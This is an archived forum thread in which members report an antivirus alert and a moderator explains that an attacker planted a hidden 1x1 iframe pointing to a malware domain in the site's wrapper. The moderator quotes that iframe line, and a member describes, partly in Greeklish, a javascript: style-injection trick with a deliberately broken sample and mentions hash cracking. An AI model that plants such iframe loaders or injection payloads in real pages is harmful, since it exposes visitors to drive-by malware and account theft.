Jump to content
Phantis Forums

The Site is infected with a virus

Athens4

By Athens4,
in Forum Announcements

Recommended Posts

Iliana Mentor

Iliana

Posted
Posted

Guys the site is infected with a virus. My Macaffee virus scan alert tells me this when I logged onto the site...

that happened to me too last night, I was freaked out :wacko: :blink:

was kinda afaid to come back today, but I think now it's solved right?

Link to comment
Share on other sites
XXX-18T Veteran

XXX-18T

Posted
Posted

its still around I got it yesterday :(

anyone know what sort of virus it is?

AVG installing itself on my computer but some how I found some infected files in my Java directory

I deleted the files and now my pc is fine.

MODS ANY FEEDBACK ON THIS?

Link to comment
Share on other sites
Lazarus Veteran

Lazarus

Posted
Posted

There were problems in the past couple of days. Problems were limited to the Sports Forums. Irlandos brought it to my attention.

Someone had posted the following code in the wrapper of the forums:

<iframe src="http://traffweb.biz/dl/adv772.php" width=1 height=1></iframe>

(DO NOT visit the above URL if your computer is not fully protected by an antivirus application)

Looking up information on traffweb.biz brings up the following:

Internet Storm Center  reports that traffweb.biz is controlled by the Coolwebsearch/Trafficadvance malware department, known to exploit security holes in the Microsoft Windows operating system.

So far, all indications point to someone gaining access to the administrative section of the Sports Forums and tampering with the page display code. It is highly possible that one of the admins had an infected with malware computer that gave his access information to individuals with bad intentions.

As a precautionary measure all other admins have been restricted from accessing the admin area of the forums for the next few days.

I am hopeful that the security breach has been corrected. All members that have visited this section (Sports Forums) within the past couple of days should run a virus scan on their computers.

If anybody notices anything similar happening at any time while visiting this site, please notify an admin immediately. By PM and email. Sometimes we don't stop by every day to check the forums (especially in cases like this -- Easter weekend) so contacting us via email also will possibly improve the chances of reaching somebody that can take some action when needed.

PS. In order to contact an admin via email all you need to do is click on the Posted Image button that appears beneath a post made by that person.

Link to comment
Share on other sites
  • 4 weeks later...
thrilossalonica Proficient

thrilossalonica

Posted
Posted

Loipon epidi kserw kati psila(xontra..) apo hacking.

LAZARUS

Auto pou ekane o allos copy paste edw einai ena bug pou exei to sugkekrimeno forum kathw skai polla alla.Ta perissotera apo auta ta kanoun eite san posts eite ta bazoun san signature kai me to pou to to blepei o admin ginete reset to pass kai epistrefei sta kanonika kserw gw admin 12345 lew paradeigma den kserw poio einai to default.An theleis na s pw tpt parapanw

[email protected] add me sto msn na sta eksigisw pio kala..kane del ta post ta dika tou kathws kai oopou exei anaferthei autos o kwdikas an kai me ton pou to anoigeis ginete i deouleia..suniths opws eipa reset ta password hashes.

Link to comment
Share on other sites
thrilossalonica Proficient

thrilossalonica

Posted
Posted

na pw oti ektos apo reset mporei apla na xaseis to hash kai na to cracaroun autoi me ena programa opws rainbow jonny the ripper h LCP kai na paroun ton kwdiko sou ;)

......

o kwdikas dne itan ekeinos alla kati san auto

[.COLOR=Posted Image]`style=background:url("javascript:document.location.replace('http://www.hackthissite.org');") [/color.]

xwris tis . dipla sto [ kai [ antistoixa..tis teleies tis ebala gia na allaksei o kwdikas kai na mhn leitourgisei to exploit kai kanw zhmia ;)

apla gia na deis pws peripou einai autoi oi kwdikes...

opws katalabes an to kanw auto paste edw kanonika esy den tha blepeis olo auto alla auto:

'.>`style=background:url("javascript:document.location.replace('http://www.hackthissite.org');".)

i teleia dipla sto ' kai sto telos prin tin ) den ta bgoun egw tis ebala gia na allaksei o kwdikas kai na mhn leitourgisei an kai auto den leitourgei alla to parapanw..esy apla auto blepeis :)

an theleis tpt parapanw

[email protected]

msn

kane edit to post tou kai des ti kwdika ebale ;)

meta dwston mou an theleis na sou pw ti ebale. logia tha prepei na ksekinaei me color..ektos an einai allou typou pou kanei tin idia douleia omws..

Link to comment
Share on other sites
Lazarus Veteran

Lazarus

Posted
Posted

Thanks thrilossalonica. To zitima exei taktopoiithei. To olo problima proekupse (pithanon) apo kapoio problima pou eixe kapoios admin.

Den uparxei problima exploit kai code injection. Episis, kaneis xristis den exei tin dunatotita na kanei post HTML kai Javascript code. To systima that to aporipsei.

Ksana thanks.

Link to comment
Share on other sites
thrilossalonica Proficient

thrilossalonica

Posted
Posted

Nice! Tha sou proteina an itheles na allakseis to forum kai na to kaneis SMF RC2 .EInai to pio asfale. Thelei polu douleia na to ksakanaies olo apo tin arxh.An dimiourgithei pali problima na portimiseis to SMF RC2.

Thrilossalonica,

GR3_CY

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

Go to topic listing

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...